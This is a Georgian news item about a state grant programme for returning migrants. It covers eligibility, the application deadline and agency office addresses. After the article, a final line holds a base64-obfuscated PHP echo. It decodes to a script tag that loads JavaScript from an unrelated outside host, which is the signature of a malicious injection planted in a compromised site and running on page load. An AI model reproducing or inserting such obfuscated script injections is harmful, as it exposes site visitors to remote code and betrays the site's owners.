celsiusi
ავერსი საქკაბელი
დევნილთა, ეკომიგრანტთა და საარსებო წყაროებით უზრუნველყოფის სააგენტო დაბრუნებულ მიგრანტთა სარეინტეგრაციო დახმარების სახელმწიფო პროგრამის ფარგლებში განაცხადების მიღებას აგრძელებს. ინფორმაციას სააგენტო ავრცელებს.
პროგრამის მიზანს ემიგრაციიდან დაბრუნებული საქართველოს მოქალაქეების რეინტეგრაციის პროცესის მხარდაჭერა წარმოადგენს.
როგორც დევნილთა, ეკომიგრანტთა და საარსებო წყაროებით უზრუნველყოფის სააგენტო იტყობინება, ამ ეტაპზე, შემოსავლის წყაროს გაჩენის, დასაქმებისა და თვითდასაქმების ხელშეწყობის მიზნით, 100-მდე პროექტი დაფინანსდება. წლის განმავლობაში განაცხადების მიღება ორ ეტაპად ცხადდება და ჯამში, გრანტი 200-მდე მიგრანტს გადაეცემა. საკუთარი საქმიანობის წამოწყებისა თუ გაფართოებისთვის საჭირო ინვენტარს, ტექნიკასა თუ ხელსაწყოებს დაბრუნებული მიგრანტები თავად შეარჩევენ.
"პროგრამაში მონაწილეობა საქართველოს მოქალაქეებს (ან მოქალაქეობის არმქონე პირებს საქართველოში მუდმივად ცხოვრების უფლებით) შეუძლიათ, რომლებიც საზღვარგარეთ ერთ წელზე მეტ ხანს არალეგალურად იმყოფებოდნენ, ან ჰქონდათ განაცხადი თავშესაფრის მიღებაზე, ან სარგებლობდნენ თავშესაფრით და სამშობლოში ბოლო 12 თვის განმავლობაში დაბრუნდნენ.
განაცხადების მიღება სააგენტოსა და მის ტერიტორიულ სამმართველოებში 24 თებერვლის ჩათვლით გაგრძელდება:
• თბილისი, თამარაშვილის ქ. N15ა;
• გორი, სამების ქ. N1;
• რუსთავი, კოსტავას ქ. N20;
• ქუთაისი, აბაშიძის გამზ. N27;
• ზუგდიდი, აღმაშენებლის ქ. N106.
განაცხადის გამოგზავნა ასევე შესაძლებელია სააგენტოს ელექტრონულ ფოსტაზე: ელ-ფოსტის ეს მისამართი დაცულია სპამ-ბოტებისგან. ნახვისთვის უნდა გქონდეთ ჩართული JavaScript.
დეტალური ინფორმაცია შეგიძლიათ იხილოთ ბმულზე - https://idp.gov.ge/statement-118/ " , - წერია სააგენტოს მიერ გავრცელებულ ინფორმაციაში.
893
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");